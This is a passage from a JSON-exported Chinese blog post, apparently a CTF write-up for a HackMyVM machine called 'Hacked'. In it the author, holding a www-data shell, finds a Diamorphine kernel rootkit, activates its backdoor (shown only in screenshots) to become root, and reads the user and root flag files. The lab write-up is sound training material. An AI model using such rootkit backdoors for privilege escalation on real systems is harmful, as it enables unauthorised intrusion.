02:36 ifpromisc\n-r--r--r--  1 www-data www-data   9011 Jun 28  2023 ifpromisc.c\n-rwxr-xr-x  1 www-data www-data 682696 Jun 11 02:36 strings-static\n-r--r--r--  1 www-data www-data   2531 Feb 23  2023 strings.c\n(remote) www-data@hacked:\/tmp\/chkrootkit-0.58b$ .\/chkrootkit\n.\/chkrootkit needs root privileges<\/code><\/pre>\n<p>\u574f\u4e86\uff0c\u9700\u8981root\u6743\u9650\uff0c\u6211\u641e\u5fd8\u6389\u4e86\u3002\u3002\u3002\u3002\u5077\u5077\u770b\u4e86\u4e00\u4e0b\u5e08\u5085\u4eec\u7684wp\u8fdb\u884c\u6392\u67e5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457053.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457053.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611145213734\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u91cc\u9762\u6709\u4e00\u4e2a<code>diamorphine<\/code>\u5c31\u662f\u4e00\u4e2a\u6f0f\u6d1e\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457054.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457054.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611145301062\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457055.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457055.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611145514196\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6fc0\u6d3b\u540e\u95e8\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457056.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506111457056.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250611145553723\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6<code>flag<\/code>\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) root@hacked:\/tmp$ find \/ -name user.txt 2&gt;\/dev\/null\n\/home\/h4x0r\/user.txt\n(remote) root@hacked:\/tmp$ find \/ -name root.txt 2&gt;\/dev\/null\n\/root\/root.txt\n(remote) root@hacked:\/tmp$ cat \/home\/h4x0r\/user.txt\nHMVimthabesthacker\n(remote) root@hacked:\/tmp$ cat \/root\/root.txt\nHMVhackingthehacker<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Hacked \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Hacked] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-852","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/852","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=852"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/852\/revisions"}],"predecessor-version":[{"id":853,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/852\/revisions\/853"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=852"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=852"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=852"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}